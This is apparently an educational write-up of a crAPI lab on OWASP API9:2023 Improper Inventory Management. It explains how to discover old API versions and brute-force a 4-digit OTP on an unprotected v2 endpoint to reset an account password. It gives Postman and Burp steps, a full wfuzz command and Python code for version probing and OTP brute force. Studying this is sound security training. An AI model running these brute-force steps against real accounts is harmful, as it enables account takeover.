API9:2023 Improper Inventory Management

Today I will talk about this API vulnerability and the steps to find it by solving a lab from crAPI (a deliberately vulnerable API application).

It's nothing new, but I liked the idea of this lab while studying the API Penetration Testing course from the API University platform, so I will try to explain it step by step in a simple way, and I will

API9:2023 Improper Inventory Management

  • This vulnerability is found when an application keeps serving out-of-date or old versions of its APIs. A typical case: you upgrade from version 3 to version 4 but leave the old version running, often without the hardening the new version received.

  • An attacker discovers unsupported and non-production versions of an API during reconnaissance (inventorying all of the APIs that are running, all the endpoints, current and older versions, and who is accessing them).

Common endpoints you can find during recon:

  • For example, our API has been updated to version 3, but some endpoints still answer on version 2, such as:

    • api.target.com/v3

    • /api/v2/accounts

    • /api/v3/accounts

    • /v2/accounts

  • API versioning could also be carried in a request header instead of the path, for example:

    • Accept: version=2.0

    • API-Version: 3

  • Non-production versions of an API include any version of the API that wasn't meant for end-user consumption (not intended for the ordinary user, e.g. a beta or trial build):

    • api.test.target.com

    • api.uat.target.com

    • beta.api.com

    • /api/private

    • /api/partner

    • /api/test
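To make the recon step above concrete, here is an added example (not from the original write-up or the course it follows) that generates the path-based and header-based version candidates listed above for one resource and keeps every candidate the server does not answer with 404. The base URL, the resource name and the fake responder it runs against offline are assumptions; swap in `http_status` to run it against a target you are authorized to test.

```python
"""Probe path-based and header-based version candidates for one API resource
and report which ones the server actually serves. Added example: the base URL,
resource name and the fake responder are assumptions, not from the write-up."""
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

VERSIONS = ("v1", "v2", "v3", "v4")          # assumed range to probe
NON_PROD = ("private", "partner", "test")    # non-production prefixes from the text


def candidates(base, resource, versions=VERSIONS):
    """Yield (url, headers) probes covering the naming styles listed above."""
    for v in versions:
        yield f"{base}/api/{v}/{resource}", {}          # /api/v2/accounts
        yield f"{base}/{v}/{resource}", {}              # /v2/accounts
        num = v[1:]
        yield f"{base}/api/{resource}", {"Accept": f"version={num}.0"}
        yield f"{base}/api/{resource}", {"API-Version": num}
    for prefix in NON_PROD:
        yield f"{base}/api/{prefix}/{resource}", {}     # /api/test/accounts


def http_status(url, headers):
    """Live sender: GET the URL and return its HTTP status (None on a
    connection error). 401/403 are returned as-is: they still prove the
    route exists, which is the point of this recon step."""
    try:
        with urlopen(Request(url, headers=headers), timeout=10) as resp:
            return resp.status
    except HTTPError as err:
        return err.code
    except URLError:
        return None


def discover(base, resource, status_of=http_status):
    """Return {(url, sorted header tuple): status} for every candidate the
    server does not answer with 404 (or fail to reach at all)."""
    found = {}
    for url, headers in candidates(base, resource):
        status = status_of(url, headers)
        if status is not None and status != 404:
            found[(url, tuple(sorted(headers.items())))] = status
    return found


def fake_status(url, headers):
    """Constructed stand-in for a server that retired v1, still serves v2 next
    to v3, honours 'API-Version: 3' as a header, and leaks /api/test."""
    if "/v2/" in url or "/v3/" in url or "/api/test/" in url:
        return 200
    if headers.get("API-Version") == "3":
        return 200
    return 404


if __name__ == "__main__":
    # Offline demo against the fake; pass http_status instead to go live.
    for (url, hdrs), status in discover("http://api.target.com", "accounts", fake_status).items():
        print(status, url, dict(hdrs))
```

The output of the offline run is the inventory you are after: v2 is still alive beside v3, v1 is gone, the header form of v3 exists, and a /api/test route leaks. Anything that is reachable but not documented is a candidate for the scenario below.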

Scenario: using an old version of the API to brute force the OTP code

  1. Fuzz the requests in our Postman collection to sort out which versions we have.

  2. Configure a test using the Collection Editor:

    1. Select the collection and choose Edit.

    2. Add this script so we know which requests were received successfully:

      pm.test("Status code is 200", function () { pm.response.to.have.status(200); });

    3. Choose the Run collection option ⇒ remove the requests that don't have a version number.

    4. Remove the token to run an unauthenticated baseline scan of the crAPI collection.

  3. When we run the test without authentication, all requests fail (that is the expected baseline).

  4. Create a new environment:

    1. Create a variable (here named ver) and give it the value v1 as both the initial value and the current value.

  5. Use "Find and Replace" on all requests to replace v2 with our variable {{ver}} (currently v1):

    1. This turns the collection's hard-coded versions into a variable.

    2. Put the variable name between {{ }}, i.e. {{ver}}, choose Select all, and replace it in all requests.

  6. After running it, I found that v3 gets a 404 error.

  7. Let's change the current value to v2 and run again. The OTP request with the version replaced by v1 gets ⇒ internal server error 500.

  8. Let's try it twice, giving the real version in two requests ⇒ first with v2 and second with v3.

    (screenshots: the first request with v2, the second with v3)

  9. This is the worst case, because we can use the unsupported version ⇒ we get a success response.

  10. When we enter the OTP too many times on v3, the account gets locked, so we can't brute force there.

  11. But on v2, brute force is possible and the account never locks ⇒ this is the vulnerability.

  12. Let's route Postman through the Burp proxy: open Settings ⇒ Proxy, add a custom proxy, and enter the same IP and port that Burp's listener uses (127.0.0.1:8080 by default).

  13. In Burp (Intruder's Grep - Match), grep for the word "Invalid": every wrong OTP returns the same 500 error containing "Invalid", so the one response that does not match is the correct OTP.

  14. Let's check the mail inbox of the crAPI platform to confirm the OTP.

  15. It's the same, so the brute force succeeded. Let's repeat it with the wfuzz tool, which sends the POST request with each candidate OTP and the new password:

    wfuzz -d '{"email":"kero@kero.com", "otp":"FUZZ","password":"NewPassword1"}' -H 'Content-Type: application/json' -z file,/usr/share/wordlists/SecLists-master/Fuzzing/4-digits-0000-9999.txt -u http://crapi.apisec.ai/identity/api/auth/v2/check-otp --hc 500

    (--hc 500 hides every response with status 500, i.e. the "Invalid OTP" answers, so only the hit is shown.)

  16. Here we succeed: the password has been reset and we can log in with it.
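The whole scenario in code, as an added example that is not part of the original write-up or of crAPI: a constructed in-memory identity service models the two behaviours observed above (v2 accepts unlimited guesses, v3 locks the account after a few wrong ones; the threshold is an assumption), and the brute-force loop uses the same "Invalid" grep to tell a miss from a hit or a lockout. The e-mail address and the check-otp URL layout are assumed from the text.

```python
"""Brute-force a 4-digit OTP against a versioned check-otp endpoint and stop
as soon as the server starts locking the account. Added example: the in-memory
service is a constructed model of the lab behaviour (v2 never locks, v3 locks
after a few wrong guesses), not crAPI's own code; the URL layout, the lockout
threshold and the e-mail address are assumptions."""
import json
from urllib.error import HTTPError
from urllib.request import Request, urlopen

LOCK_AFTER = 5  # assumed lockout threshold of the supported version (v3)


class FakeIdentityService:
    """Constructed stand-in for the identity service behind /check-otp."""

    def __init__(self, real_otp):
        self.real_otp = real_otp
        self.wrong = {}            # (version, email) -> wrong-guess counter
        self.new_password = None   # set once the right OTP is presented

    def check_otp(self, version, email, otp, password):
        key = (version, email)
        if version not in ("v2", "v3"):
            return 404, {"message": "Not Found"}
        if version == "v3" and self.wrong.get(key, 0) >= LOCK_AFTER:
            return 503, {"message": "Account locked: too many attempts"}
        if otp != self.real_otp:
            self.wrong[key] = self.wrong.get(key, 0) + 1
            return 500, {"message": "Invalid OTP! Please try again.."}
        self.new_password = password
        return 200, {"message": "OTP verified"}


def http_send(url, body):
    """Live sender: POST JSON and return (status, parsed body)."""
    req = Request(url, data=json.dumps(body).encode(),
                  headers={"Content-Type": "application/json"}, method="POST")
    try:
        with urlopen(req, timeout=10) as resp:
            return resp.status, json.loads(resp.read() or b"{}")
    except HTTPError as err:
        return err.code, json.loads(err.read() or b"{}")


def brute_force_otp(send, version, email, password):
    """Try 0000..9999 in order. Wrong guesses carry 'Invalid' in the message
    (the grep used in Burp); anything else ends the run: a 200 is the hit,
    a lockout or a missing version is reported as such."""
    for i in range(10000):
        otp = f"{i:04d}"
        status, body = send(version, {"email": email, "otp": otp, "password": password})
        msg = body.get("message", "")
        if "Invalid" in msg:
            continue
        if status == 200:
            return {"otp": otp, "attempts": i + 1, "reason": "found", "status": status}
        reason = "locked" if "lock" in msg.lower() else "unexpected"
        return {"otp": None, "attempts": i + 1, "reason": reason, "status": status}
    return {"otp": None, "attempts": 10000, "reason": "exhausted", "status": None}


if __name__ == "__main__":
    svc = FakeIdentityService("0427")   # constructed OTP for the offline demo
    send = lambda ver, body: svc.check_otp(ver, **body)
    for ver in ("v3", "v2"):
        print(ver, brute_force_otp(send, ver, "kero@kero.com", "NewPassword1"))
    # Against the lab itself (URL assumed from the text):
    # send = lambda ver, body: http_send(
    #     f"http://crapi.apisec.ai/identity/api/auth/{ver}/check-otp", body)
```

Run offline, v3 stops after the sixth request with a lockout and the password is untouched, while v2 walks all the way to the right code and resets it. That difference is the finding: the old version was left behind without the lockout the new one got, so the fix is either to retire v2 or to put it behind the same rate limiting and lockout as v3.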
